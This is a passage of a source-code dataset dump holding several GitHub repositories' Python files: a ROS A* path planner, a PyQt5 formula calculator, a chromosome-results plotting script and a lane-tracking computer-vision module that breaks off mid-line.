refs/heads/master
| 2020-03-27T02:12:50.164758 | 2018-08-22T23:32:02 | 2018-08-22T23:32:02 | 145,773,775 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6213032007217407,
"alphanum_fraction": 0.6323635578155518,
"avg_line_length": 23.533924102783203,
"blob_id": "18eff975ff7b1b07b12dac77765d9c353f4a4d8d",
"content_id": "38a0509a5f13529de44c292c4a83f595c30e01af",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8318,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 339,
"path": "/src/pub_globalplanner.py",
"repo_name": "rafaelbarretorb/my_astar_pub",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n\n\"\"\"\n\tThis node makes the A* Path Planning and publish the path in RViz using markers\n\n\"\"\"\n\n# chmod +x call_map_service.py\nimport rospy\nfrom nav_msgs.srv import GetMap, GetMapRequest\nimport sys \nimport numpy as np\nimport math\n\nfrom visualization_msgs.msg import Marker\nfrom geometry_msgs.msg import Point\n\nfrom geometry_msgs.msg import PoseWithCovarianceStamped\n\nfrom geometry_msgs.msg import PoseStamped\n\nfrom nav_msgs.msg import OccupancyGrid\n\n\nclass Node:\n def __init__(self, x, y, cost, pind):\n self.x = x\n self.y = y\n self.cost = cost\n self.pind = pind # parent indice\n\n\nclass GlobalPlanner():\n\tdef __init__(self):\n\t\trospy.init_node('global_planner')\n\t\tself.rate = rospy.Rate(30)\n\n\t\t# SUBSCRIBERS\n\n\t\t# Get the cost map\n\t\trospy.Subscriber('/move_base/global_costmap/costmap', OccupancyGrid, self.global_costmap_cb)\n\n\t\trospy.Subscriber('move_base_simple/goal', PoseStamped, self.goal_pose_cb)\n\n\t\trospy.Subscriber('/amcl_pose', PoseWithCovarianceStamped, self.start_pose_cb)\n\n\n\t\t# member variables\n\t\tself.MAP = None\n\t\tself.ROWS = None\n\t\tself.COLUMNS = None\n\t\tself.RESOLUTION = None\n\n\t\tself.goal = None\n\t\tself.start = None\n\n\t\t#self.grid = self.make_grid(self.MAP.data, self.ROWS, self.COLUMNS)\n\t\t\n\n\t\tself.loop()\n\n\t\trospy.spin()\n\n\n\t\t#\n\t# global costmap callback\n\tdef global_costmap_cb(self, msg):\n\t\tself.MAP = msg\n\n\t\t# Make the map grid only after receive the costmap\n\t\tself.grid = self.make_grid(msg.data, msg.info.height, msg.info.width)\n\t\tprint msg.info.resolution\n\t\tprint msg.info.height\n\n\n\tdef start_pose_cb(self, msg):\n\t\tself.start = msg\n\n\tdef goal_pose_cb(self, msg):\n\t\tself.goal = msg\n\n\n\tdef make_grid(self, map_data, grid_height, grid_width):\n\t\tgrid = np.zeros([grid_height, grid_width])\n\t\t# Occupancy grid\n\t\tfor index in range(len(map_data)):\n\t\t\trow = (int)(index/grid_width)\n\t\t\tcolumn = index%grid_width\n\t\t\tgrid[row][column] = map_data[index]\n\n\t\tprint \"grid shape: \"\n\t\tprint grid.shape\n\t\treturn grid\n\n\tdef calc_final_path(self, ngoal, closedset):\n\t\t# generate final course\n\t\trx, ry = [ngoal.x ], [ngoal.y]\n\t\tpind = ngoal.pind\n\t\twhile pind != -1:\n\t\t\tn = closedset[pind]\n\t\t\trx.append(n.x)\n\t\t\try.append(n.y)\n\t\t\tpind = n.pind\n\n\t\treturn rx, ry\n\n\t# A* Planner\n\tdef a_star_planning(self, start_x, start_y, goal_x, goal_y):\n\t \"\"\"\n\t start_x: start x position [m]\n\t start_y: start y position [m]\n\t goal_x: goal x position [m]\n\t goal_y: goal y position [m]\n\t \"\"\"\n\n\t # Initialize the start node and the goal node\n\t nstart = Node(start_x, start_y, 0.0, -1)\n\t ngoal = Node(goal_x, goal_y, 0.0, -1)\n\n\n\t motion = self.get_motion_model()\n\n\t openset, closedset = dict(), dict()\n\n\t # TODO nstart\n\t openset[(start_x,start_y)] = nstart\n\n\n\t while 1:\n\t \t# it selects the path that minimizes the function f(n) = g(n) + h(n), g(n) = cost and h(n) = heuristic\n\t\t\tc_id = min(openset, key=lambda n: openset[n].cost + self.heuristic(ngoal, openset[n].x, openset[n].y))\n\t\t\tcurrent = openset[c_id]\n\t\t\t#print(\"current\", current)\n\n\t # verify is the goal was achieved\n\t\t\tif current.x == ngoal.x and current.y == ngoal.y:\n\t\t\t\tprint(\"Find goal\")\n\t\t\t\tngoal.pind = current.pind\n\t\t\t\tngoal.cost = current.cost\n\t\t\t\tbreak\n\t \n\t\t\t# Remove the item from the open set\n\t\t\tdel openset[c_id]\n\n\t\t\t# Add it to the closed 
set\n\t\t\tclosedset[c_id] = current\n\n\t # expand search grid based on motion model\n\t # create new Nodes\n\t\t\tfor i in range(len(motion)):\n\t\t\t\tnode = Node(current.x + motion[i][0], current.y + motion[i][1], current.cost + motion[i][2], c_id)\n\t\t\t\t# node id?\n\t\t\t\tn_id = self.calc_index(node)\n\n\t\t\t\t# verify node\n\t\t\t\tif not self.verify_node(node):\n\t\t\t\t continue\n\n\t\t\t\tif n_id in closedset:\n\t\t\t\t\tcontinue\n\n\t\t\t\t# Otherwise if it is already in the open set\n\t\t\t\tif n_id in openset:\n\t\t\t\t\tif openset[n_id].cost > node.cost:\n\t\t\t\t\t\topenset[n_id].cost = node.cost\n\t\t\t\t\t\topenset[n_id].pind = c_id\n\t\t\t\telse:\n\t\t\t\t\topenset[n_id] = node\n\n\t rx, ry = self.calc_final_path(ngoal, closedset)\n\n\t return rx, ry\n\n\t# Heuristic\n\tdef heuristic(self, ngoal, x, y):\n\t w = 3.0 # weight of heuristic\n\t d = w * math.sqrt((ngoal.x - x)**2 + (ngoal.y - y)**2)\n\t return d\n\n\n\tdef verify_node(self, node):\n\n\t if node.x < 0:\n\t return False\n\t elif node.y < 0:\n\t return False\n\t elif node.x >= self.grid.shape[1]:\n\t return False\n\t elif node.y >= self.grid.shape[0]:\n\t return False\n\t elif self.grid[node.y][node.x] > 50:\n\t \treturn False\n\t \n\t return True\n\n\tdef calc_index(self, node):\n\t\treturn (node.y, node.x)\n\n\tdef get_motion_model(self):\n\t # dx, dy, cost\n\t motion = [[1, 0, 1],\n\t [0, 1, 1],\n\t [-1, 0, 1],\n\t [0, -1, 1],\n\t [-1, -1, math.sqrt(2)],\n\t [-1, 1, math.sqrt(2)],\n\t [1, -1, math.sqrt(2)],\n\t [1, 1, math.sqrt(2)]]\n\n\t return motion\n\n\n\tdef init_markers(self):\n\n\t\t# Set up our waypoint markers\n\t\tmarker_scale = 0.05\n\t\tmarker_lifetime = 0 # 0 is forever\n\t\tmarker_ns = 'waypoints'\n\n\t\tmarker_id = 1\n\n\t\tmarker_color = {'r': 1.0, 'g': 0.0, 'b': 0.0, 'a': 1.0}\n\n\n\t\t# Define a marker publisher.\n\n\t\t#self.marker_pub = rospy.Publisher('waypoint_markers', Marker, queue_size=100)\n\t\t#self.marker_pub = rospy.Publisher('/visualization_marker', Marker, queue_size=1000)\n\n\n\t\t# Initialize the marker points list.\n\n\t\tself.markers = Marker()\n\t\tself.markers.ns = marker_ns\n\t\tself.markers.id = marker_id\n\t\tself.markers.type = Marker.POINTS\n\t\tself.markers.action = Marker.ADD\n\t\tself.markers.lifetime = rospy.Duration(marker_lifetime)\n\n\t\tself.markers.scale.x = marker_scale\n\n\t\tself.markers.scale.y = marker_scale\n\n\t\tself.markers.color.r = marker_color['r']\n\t\tself.markers.color.g = marker_color['g']\n\t\tself.markers.color.b = marker_color['b']\n\t\tself.markers.color.a = marker_color['a']\n\t\tself.markers.header.frame_id = '/map'\n\t\tself.markers.header.stamp = rospy.Time.now()\n\t\tself.markers.points = list()\n\n\n\tdef loop(self):\n\t\t\n\t\twhile not rospy.is_shutdown():\n\t\t\trospy.wait_for_message('move_base_simple/goal', PoseStamped)\n\n\t\t\t## TODO: delete previous result path if it exists\n\t\t\t#deleteMarker(marker_id)\n\n\t\t\t# Print \" We have a new goal!\"\n\n\n\n\t\t\t# Initialize the visualization markers for RViz\n\t\t\t#self.init_markers()\n\n\t\t\tstart_x = self.start.pose.pose.position.x\n\t\t\tstart_y = self.start.pose.pose.position.y\n\t\t\tgoal_x = self.goal.pose.position.x\n\t\t\tgoal_y = self.goal.pose.position.y \n\n\t\t\t# convert to cell\n\t\t\tprint \"\"\n\t\t\tprint start_x, start_y, goal_x, goal_y\n\n\t\t\t# TODO: Given the robot's pose in the map frame, if you want the corresponding index into the occupancy grid map, you'd do something like this:\n\t\t\tstart_grid_x = int((start_x - 
self.MAP.info.origin.position.x) / self.MAP.info.resolution)\n\t\t\tstart_grid_y = int((start_y - self.MAP.info.origin.position.y) / self.MAP.info.resolution)\n\n\t\t\tgoal_grid_x = int((goal_x - self.MAP.info.origin.position.x) / self.MAP.info.resolution)\n\t\t\tgoal_grid_y = int((goal_y - self.MAP.info.origin.position.y) / self.MAP.info.resolution)\n\n\t\t\tprint start_grid_x, start_grid_y, goal_grid_x, goal_grid_y\n\t\t\tprint \"\"\n\n\t\t\trx ,ry = self.a_star_planning(start_grid_x, start_grid_y, goal_grid_x, goal_grid_y)\n\t\t\tpoints_list = []\n\t\t\t#print rx\n\t\t\t#print ry\n\t\t\t\n\t\t\ti = 0\n\t\t\tmarker_pub = rospy.Publisher('/a_star', Marker, queue_size=1000)\n\n\t\t\t\n\t\t\twhile(i < len(rx)):\t\t\t\n\n\n\t\t\t\t#self.markers.points.append(p)\n\t\t\t\t#self.marker_pub.publish(self.markers)\n\n\t\t\t\tpoints = Marker()\n\t\t\t\t#points.header.frame_id = \"/my_frame\"\n\t\t\t\tpoints.header.frame_id = \"/map\"\n\t\t\t\tpoints.header.stamp = rospy.Time.now()\n\t\t\t\tpoints.ns = \"points_and_lines\"\n\t\t\t\tpoints.action = points.ADD\n\t\t\t\tpoints.pose.orientation.w = 1.0\n\t\t\t\tpoints.id = 1\n\t\t\t\tpoints.type = points.POINTS\n\t\t\t\tpoints.scale.x = 0.05\n\t\t\t\tpoints.scale.y = 0.05\n\t\t\t\tpoints.scale.z = 0.05\n\t\t\t\tpoints.color.r = 1.0\n\t\t\t\tpoints.color.a = 1.0\n\n\t\t\t\tp = Point()\n\n\t\t\t\tp.x = rx[i]*self.MAP.info.resolution + self.MAP.info.origin.position.x\n\t\t\t\tp.y = ry[i]*self.MAP.info.resolution + self.MAP.info.origin.position.y\n\t\t\t\tp.z = 0.0\n\n\t\t\t\tpoints_list.append(p)\n\n\t\t\t\tpoints.points = points_list\n\n\t\t\t\tmarker_pub.publish(points)\n\t\t\t\ti = i + 1\n\t\t\t\t\t\t\t\n\t\t\t## TODO: update the goal\n\t\t\t#print points_list\n\t\t\tself.rate.sleep()\n\n\nif __name__ == '__main__':\n\ttry:\n\t\tGlobalPlanner()\n\texcept rospy.ROSInterruptException:\n\t\trospy.loginfo(\"Global Planner finished.\")\n\n"
}
] | 1 |
thekupidman/pythonravil9
|
https://github.com/thekupidman/pythonravil9
|
91d73917463fc4affd0bbb5ebf587dd349ff1811
|
6889d65011384e7f528a91ed713c9acd84c8b3da
|
48d86c95dc04cd50ce4063725423198e1b3d9e3f
|
refs/heads/master
| 2020-12-20T10:10:11.585462 | 2020-01-24T16:17:48 | 2020-01-24T16:17:48 | 236,037,434 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.47202008962631226,
"alphanum_fraction": 0.5337515473365784,
"avg_line_length": 23.75155258178711,
"blob_id": "b7a20d0676397cb5607cfeba73b4e976f7f28726",
"content_id": "06709b031f0a7a6cd893f368672fcaec87f42e08",
"detected_licenses": [
"Unlicense"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4030,
"license_type": "permissive",
"max_line_length": 130,
"num_lines": 161,
"path": "/pythonravil9/Main.py",
"repo_name": "thekupidman/pythonravil9",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# coding=utf-8\n\nimport sys\nimport sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5 import uic,QtGui\nimport random\n\n\nclass MyRaschet:\n\n def __init__(self):\n self.A = 0\n self.B = 0\n self.X = 0\n self.KK = [0,0,0,0,0,0,0,0,0,0]\n self.YY = [0,0,0,0,0,0,0,0,0,0]\n\n def setA(self, v):\n self.A = float(v)\n\n def setB(self, v):\n self.B = float(v)\n\n def setX(self, v):\n self.X = float(v)\n\n def setKK(self, i, v):\n self.KK[i] = float(v)\n\n def raschet(self):\n i = 0\n while i < 10:\n sum = 0\n proizv = 1\n p = 0\n while p <= i:\n proizv = proizv * self.KK[p]\n if p % 2 == 1:\n sum = sum + self.KK[p]\n p = p + 1\n\n self.YY[i] = (((self.A * (self.X ** 4) + self.B * (self.X ** 3)) / (self.A ** 2 - self.B ** 3)) ** 3) / (proizv - sum)\n\n\n\n\n\n\n\n i = i + 1\n\n def getYY(self, i):\n return self.YY[i]\n\n\nclass Example(QWidget):\n\n def __init__(self):\n super().__init__()\n QWidget.__init__(self)\n self.initUI()\n self.setWindowIcon(QtGui.QIcon('images/logo.png'))\n\n def initUI(self):\n self.table = QTableWidget(self)\n self.table.setGeometry(8, 8, 249, 400)\n self.table.setColumnCount(2)\n self.table.setRowCount(10)\n\n self.btn1 = QPushButton(\"Заполнить случайными числами\", self)\n self.btn1.setGeometry(263, 288, 170, 57)\n\n self.btn2 = QPushButton(\"Очистить\", self)\n self.btn2.setGeometry(439, 288, 170, 57)\n\n self.btn3 = QPushButton(\"Расчет\", self)\n self.btn3.setGeometry(263, 351, 170, 57)\n\n self.btn4 = QPushButton(\"Выход\", self)\n self.btn4.setGeometry(439, 351, 170, 57)\n\n self.label = QLabel(self)\n self.label.setGeometry(263, 8, 350, 55)\n pixmap = QPixmap('9.png')\n self.label.setPixmap(pixmap)\n\n self.label1 = QLabel(self)\n self.label1.setGeometry(263, 115, 50, 15)\n self.label1.setText(\"A = \")\n\n self.label2 = QLabel(self)\n self.label2.setGeometry(263, 155, 50, 15)\n self.label2.setText(\"B = \")\n\n self.label3 = QLabel(self)\n self.label3.setGeometry(263, 195, 50, 15)\n self.label3.setText(\"X = \")\n\n self.edit1 = QTextEdit(self)\n self.edit1.setGeometry(312, 112, 121, 21)\n\n self.edit2 = QTextEdit(self)\n self.edit2.setGeometry(312, 152, 121, 21)\n\n self.edit3 = QTextEdit(self)\n self.edit3.setGeometry(312, 192, 121, 21)\n\n self.btn1.clicked.connect(self.btn1Click)\n self.btn2.clicked.connect(self.btn2Click)\n self.btn3.clicked.connect(self.btn3Click)\n self.btn4.clicked.connect(self.btn4Click)\n\n self.setGeometry(300, 300, 635, 460)\n self.setWindowTitle('Test')\n self.show()\n\n def btn1Click(self):\n y = 0\n while y < 10:\n self.table.setItem(y, 0, QTableWidgetItem(str(random.randint(1, 99))))\n y = y + 1\n\n def btn2Click(self):\n y = 0\n while y < 10:\n self.table.setItem(y, 0, QTableWidgetItem(\"\"))\n self.table.setItem(y, 1, QTableWidgetItem(\"\"))\n y = y + 1\n\n def btn3Click(self):\n raschet = MyRaschet()\n\n raschet.setA(self.edit1.toPlainText())\n raschet.setB(self.edit2.toPlainText())\n raschet.setX(self.edit3.toPlainText())\n\n y = 0\n while y < 10:\n v = self.table.item(y, 0).text()\n raschet.setKK(y, v)\n y = y + 1\n\n raschet.raschet()\n\n y = 0\n while y < 10:\n self.table.setItem(y, 1, QTableWidgetItem(str(raschet.getYY(y))))\n y = y + 1\n\n def btn4Click(self):\n QApplication.exit()\n\nif __name__=='__main__':\n\n app = QApplication(sys.argv)\n ex = Example()\n sys.exit(app.exec_())\n"
}
] | 1 |
hylcos/CHR6Results
|
https://github.com/hylcos/CHR6Results
|
74a60d423f1ed33103bff10805018888e1e61695
|
a80ff7eaf02b3c7415816267a8f791791d9dd4e6
|
db6d7aa38763a9a2ad9bf1edefcd23a5f5d78981
|
refs/heads/master
| 2020-04-14T18:23:46.067772 | 2019-01-04T07:08:48 | 2019-01-04T07:08:48 | 164,017,329 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5249636173248291,
"alphanum_fraction": 0.5399903059005737,
"avg_line_length": 31.234375,
"blob_id": "cf444171be9b9254d39dded2d895d77f6dad1759",
"content_id": "5dbd65949b756a50c110dcf14cee77f10f67e2f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2063,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 64,
"path": "/main.py",
"repo_name": "hylcos/CHR6Results",
"src_encoding": "UTF-8",
"text": "import xlrd\nfrom xlrd.biffh import XL_CELL_EMPTY, XL_CELL_TEXT\nfrom pathlib import Path\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport re\n\n\nclass Patient:\n def __init__(self, data):\n self.Patient = data[0].value\n self.Platform = data[1].value\n self.Cytogenetic_aberration = data[2].value\n random_not = data[3].value\n numbers = re.findall(\"\\([0-9\\?_]*\\)\", random_not)\n self.chrom = list()\n for n in numbers:\n n = n.replace(\"(\", \"\").replace(\")\", \"\")\n n = n.split(\"_\")\n if n[0] == \"?\":\n self.chrom.append(int(n[1]))\n self.chrom.append(int(n[1]))\n elif n[1] == \"?\":\n self.chrom.append(int(n[0]))\n self.chrom.append(int(n[0]))\n else:\n p = (int(n[0]) + int(n[1])) // 2\n self.chrom.append(p)\n self.chrom.append(p)\n self.mb = self.chrom[2] - self.chrom[1]\n self.length = data[4].value\n print(self.mb, self.length)\n self.OMIM_genes = data[5].value\n self.OMIM_disease_related_genes = data[6].value\n self.Origin = data[7].value\n\n\nif __name__ == '__main__':\n patients = list()\n data_path = Path().cwd() / \"data\" / \"testdata.xlsx\"\n workbook = xlrd.open_workbook(str(data_path))\n geno = workbook.sheets()[0]\n rows = [row for row in geno.get_rows()]\n columns = [c.value for c in rows[0]]\n x = []\n for row in rows[1:]:\n if row[0].ctype is XL_CELL_TEXT and row[1].ctype is XL_CELL_EMPTY:\n patients.append(\"\")\n x.append([])\n elif row[0].ctype is XL_CELL_TEXT and row[1].ctype is XL_CELL_TEXT:\n p = Patient(row)\n patients.append(p.Patient)\n x.append(p.chrom)\n\n x.reverse()\n patients.reverse()\n df = pd.DataFrame(x, index=patients)\n\n print(df)\n df.T.boxplot(vert=False)\n plt.subplots_adjust(left=0.25)\n plt.gca().xaxis.set_major_formatter(plt.FormatStrFormatter('%d'))\n plt.show()\n"
},
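The regex-based coordinate parsing in `Patient.__init__` above is easy to exercise in isolation. Below is a small standalone sketch of that logic; the aberration string is a hypothetical example, not real study data:

```python
import re

# Standalone sketch of the coordinate parsing in Patient.__init__ above.
# The notation string is a hypothetical example, not real study data.
notation = "(70230000_71890000)(81000000_?)"

chrom = []
for token in re.findall(r"\([0-9\?_]*\)", notation):
    start, end = token.strip("()").split("_")
    if start == "?":          # unknown start: fall back to the end position
        midpoint = int(end)
    elif end == "?":          # unknown end: fall back to the start position
        midpoint = int(start)
    else:                     # both bounds known: take the integer midpoint
        midpoint = (int(start) + int(end)) // 2
    chrom.extend([midpoint, midpoint])  # doubled, as in the class above

print(chrom)               # [71060000, 71060000, 81000000, 81000000]
print(chrom[2] - chrom[1])  # the "mb" span: 9940000
```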
{
"alpha_fraction": 0.8190476298332214,
"alphanum_fraction": 0.8380952477455139,
"avg_line_length": 51.5,
"blob_id": "65eccf1a45268ab78698f411471f529b9554fd8f",
"content_id": "e09bbeb04eb5ff747377ff506c2e237b54278f8b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 105,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 2,
"path": "/README.md",
"repo_name": "hylcos/CHR6Results",
"src_encoding": "UTF-8",
"text": "# CHR6Results\nThis repositoy contains files for reading, extracting and displaying Chromosome 6 results.\n"
}
] | 2 |
qcqqcq/udacity-CarND-Advanced-Lane-Tracking-P4
|
https://github.com/qcqqcq/udacity-CarND-Advanced-Lane-Tracking-P4
|
ae8e8318bfa3e6e8388263d519685bfb303d863f
|
d7fda14e33644e9892e7758e2b87353b0a591617
|
d4ab0554e5f08fd0e7fcb6e3f51bdb0d4813d07b
|
refs/heads/master
| 2020-05-30T08:46:15.213488 | 2017-02-24T05:07:39 | 2017-02-24T05:07:39 | 82,618,498 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5929126739501953,
"alphanum_fraction": 0.6059442162513733,
"avg_line_length": 33.33280944824219,
"blob_id": "e96da4e59f8ef2c449933a99bd4d30bc45750b5d",
"content_id": "a1be1b70488e2ee76a6616a6a29c1b89d0bab238",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 21870,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 637,
"path": "/tracktools.py",
"repo_name": "qcqqcq/udacity-CarND-Advanced-Lane-Tracking-P4",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport cv2\nimport glob\nimport matplotlib.image as mpimg\nimport pdb\n\n \n\ndef get_img_from_filename(file_name):\n '''Define explicit function to use correct imread. \n Avoids user using an imread that returns BGR instead of RGB\n '''\n\n return mpimg.imread(file_name)\n\n\n\nclass ImageProcessor():\n def __init__(self):\n self.mtx = None\n self.dist = None\n self.M = None\n self.Minv = None\n self.thresher = None\n\n def ingest_image(self,img):\n self.raw_img = img\n self.img = self.undistort_image(img)\n self.gray = cv2.cvtColor(self.img,cv2.COLOR_RGB2GRAY)\n\n self.num_rows = img.shape[0]\n self.num_cols = img.shape[1]\n\n ret = self.warp_perspective()\n if ret is None:\n print('Re-run ingest_image after setting warp points')\n\n ret = self.get_binary()\n if ret is None:\n print('Re-run ingest_image after ingesting a thresholder object ')\n\n def calibrate_from_existing(self,calibrated_processor):\n self.mtx = calibrated_processor.mtx\n self.dist = calibrated_processor.dist\n\n\n def calibrate_camera(self):\n ''' Calculates the correct camera matrix and distortion coefficients using the calibration chessboard images\n '''\n\n # Make a list of calibration image\n calibration_image_files = glob.glob('./camera_cal/calibration*.jpg')\n \n # Arrays to store object points and image points from all the images\n objpoints = [] # 3d points in real world space\n imgpoints = [] # 2d points in image plane.\n \n # prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)\n # here we assume the object (checker board) is a flat surface, so the\n # z-values are all 0. \n objp = np.zeros((6*9,3), np.float32)\n objp[:,:2] = np.mgrid[0:9,0:6].T.reshape(-1,2)\n \n \n # Step through the calibration images and search for chessboard corners\n for fname in calibration_image_files:\n # Read image from file and convert to gray\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n \n # Find the chessboard corners using gray channel\n ret, corners = cv2.findChessboardCorners(gray, (9,6),None)\n \n # If found, add object points, image points\n if ret == True:\n objpoints.append(objp)\n imgpoints.append(corners)\n \n # Draw and display the corners\n #img = cv2.drawChessboardCorners(img, (9,6), corners, ret)\n #plt.imshow(img)\n \n # Use image and object points to calibrate camera\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1],None,None)\n\n self.mtx = mtx\n self.dist = dist\n \n \n def undistort_image(self,img):\n '''Undistored image to reduce radial and tangental distortion'''\n\n if (self.mtx is None) or (self.dist is None):\n print('Error: Camera not calibrated')\n raise Exception\n \n # Undistort\n undistorted = cv2.undistort(img, self.mtx, self.dist, None, self.mtx)\n\n return undistorted\n\n def set_warp_source_points(self,top_row,bottom_row\n ,bottom_left,top_left\n ,top_right,bottom_right):\n '''Set source points for perspective warping'''\n\n # Arrange parameters into points\n src1 = (bottom_left,bottom_row) # Bottom left\n src2 = (top_left,top_row) # Top left\n src3 = (top_right,top_row) # Top right\n src4 = (bottom_right,bottom_row) # Bottom right\n\n # Save points as array of points\n self.src = np.float32([src1,src2,src3,src4]) \n \n \n # Get perpective transform\n self.get_perspective_transforms()\n\n def get_perspective_transforms(self):\n '''Set destination points for perspective warping and \n given src and dst points, calculate the perspective \n transform matrix'''\n\n offset = 300\n\n # 
Arrange points based on image size and offset\n dst1 = (offset,self.num_rows) # Bottom left\n dst2 = (dst1[0],offset) # Top left\n dst3 = (self.num_cols-offset,dst2[1]) # Top right\n dst4 = (dst3[0],dst1[1]) # Bottom right\n \n # Save points as array of points\n self.dst = np.float32([dst1, dst2, dst3, dst4])\n\n # Get perspective transform\n self.M = cv2.getPerspectiveTransform(self.src, self.dst)\n self.Minv = cv2.getPerspectiveTransform(self.dst, self.src)\n\n def warp_perspective(self):\n '''Perform warp to get bird's eye perspective'''\n\n if self.M is None:\n print('Perspective warp not performed, transform matrix is None')\n return\n\n warped = cv2.warpPerspective(self.img, self.M, (self.num_cols,self.num_rows))\n self.warped = warped\n\n # Also make a gray version\n self.warped_gray = cv2.cvtColor(warped,cv2.COLOR_BGR2GRAY)\n\n return warped\n\n\n def ingest_lanes(self,left_lane,right_lane,lane_verifier):\n\n lane_verifier.ingest_lanes(left_lane,right_lane)\n\n '''Fill area between lane'''\n\n # Create an image to draw the lines on\n zero_img = np.zeros_like(self.binary).astype(np.uint8)\n filled_lanes = np.dstack((zero_img, zero_img,zero_img))\n\n # Recast the x and y points into usable format for cv2.fillPoly()\n pts_left = np.array([np.transpose(np.vstack([left_lane.smooth_poly_cols,left_lane.poly_rows]))])\n pts_right = np.array([np.flipud(np.transpose(np.vstack([right_lane.smooth_poly_cols, right_lane.poly_rows])))])\n #pts_right = np.array([np.flipud(np.transpose(np.vstack([poly_lanes['right'][1], poly_lanes['right'][0]])))])\n pts = np.hstack((pts_left, pts_right))\n\n # Draw the lane onto the warped blank image\n cv2.fillPoly(filled_lanes, np.int_([pts]), (0,255, 0))\n\n unwarped_lanes = cv2.warpPerspective(filled_lanes, self.Minv, (self.num_cols,self.num_rows))\n overlayed_image = cv2.addWeighted(self.img, 1, unwarped_lanes, 0.3, 0)\n\n self.overlayed = overlayed_image\n self.unwarped_lanes = unwarped_lanes\n self.get_offset_from_center()\n\n\n # Annotate image\n font = cv2.FONT_HERSHEY_SIMPLEX\n # Left curve\n curve_str = 'Left Radius of Curvature: %im'%left_lane.radius_of_curve\n cv2.putText(overlayed_image,curve_str,(100,100),font,1,(255,255,255),2,cv2.LINE_AA)\n\n # Right curve\n curve_str = 'Right Radius of Curvature: %im'%right_lane.radius_of_curve\n cv2.putText(overlayed_image,curve_str,(100,200),font,1,(255,255,255),2,cv2.LINE_AA)\n\n # Distance to right\n distance_str = 'Offset from Center (+ is Right): %.1f'%self.meters_to_right\n cv2.putText(overlayed_image,distance_str,(100,300),font,1,(255,255,255),2,cv2.LINE_AA)\n\n \n\n\n\n def get_offset_from_center(self):\n _,hot_cols = self.unwarped_lanes[:,:,1].nonzero()\n\n # Lane width\n left_lane_px = min(hot_cols) \n right_lane_px = max(hot_cols)\n lane_width_px = right_lane_px - left_lane_px\n \n # Meters per pixel\n lane_width_m = 3.7\n m_per_px = lane_width_m/lane_width_px\n \n # Lane center\n lane_center = (left_lane_px + right_lane_px)/2\n image_center = self.overlayed.shape[1]/2\n\n # Offset from center\n pixels_to_right = image_center - lane_center\n meters_to_right = pixels_to_right*m_per_px\n \n self.meters_to_right = meters_to_right\n\n def ingest_thresher(self,thresher):\n self.thresher = thresher\n\n def get_binary(self):\n if self.thresher is None: return\n self.binary = self.thresher.get_binary(self)\n return self.binary\n\n\nclass Thresher():\n ''' Thresholds images to form binaries\n Usually not used directly. 
Just to visualization purposes'''\n\n def __init__(self,sobel_kernel,dir_thresh,mag_thresh,s_thresh):\n self.absgraddir = None\n\n # Set thresholds\n self.sobel_kernel = sobel_kernel\n self.dir_thresh = dir_thresh\n self.mag_thresh = mag_thresh\n self.s_thresh = s_thresh\n\n\n def calculate_sobel(self,gray):\n '''Calculates X and Y direction Sobels'''\n\n \n # Calcualte sobel\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=self.sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=self.sobel_kernel) \n\n\n # Calculate quantities derived from Sobel\n\n # Absolute direction of Sobel gradient\n self.absgraddir = np.arctan2(np.absolute(sobely), np.absolute(sobelx))\n # Magnitude of Sobel gradient\n gradmag = np.sqrt(sobelx**2 + sobely**2)\n # Rescale to 8 bit\n scale_factor = np.max(gradmag)/255 \n self.gradmag = (gradmag/scale_factor).astype(np.uint8) \n\n\n def sobel_direction_threshold(self,gray):\n '''Create binary based on Sobel direction thresholding'''\n \n # Take the absolute value of the gradient direction, \n # apply a threshold, and create a binary image result\n\n self.calculate_sobel(gray)\n \n thresh = self.dir_thresh\n binary_output = np.zeros_like(self.absgraddir)\n binary_output[(self.absgraddir >= thresh[0]) & (self.absgraddir <= thresh[1])] = 1\n \n # Return the binary\n return binary_output\n \n \n def sobel_magnitude_threshold(self,gray):\n '''Create binary based on Sobel magnitude thresholding'''\n\n self.calculate_sobel(gray)\n \n thresh = self.mag_thresh\n binary_output = np.zeros_like(self.gradmag)\n binary_output[(self.gradmag >= thresh[0]) & (self.gradmag <= thresh[1])] = 1\n \n # Return the binary\n return binary_output\n \n def saturation_threshold(self,img):\n '''Threshold the S-channel of HLS'''\n hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS) \n h_channel = hls[:,:,0]\n l_channel = hls[:,:,1]\n s_channel = hls[:,:,2]\n\n self.s_channel = s_channel\n \n thresh = self.s_thresh\n binary_output = np.zeros_like(s_channel)\n binary_output[(s_channel >= thresh[0]) & (s_channel <= thresh[1])] = 1\n\n # Return the binary\n return binary_output\n \n def get_binary(self,img_processor,thresh=0.5):\n '''Main method to create a combined binary image'''\n\n sobel_direction_binary = self.sobel_direction_threshold(img_processor.warped_gray)\n sobel_magnitude_binary = self.sobel_magnitude_threshold(img_processor.warped_gray)\n saturation_binary = 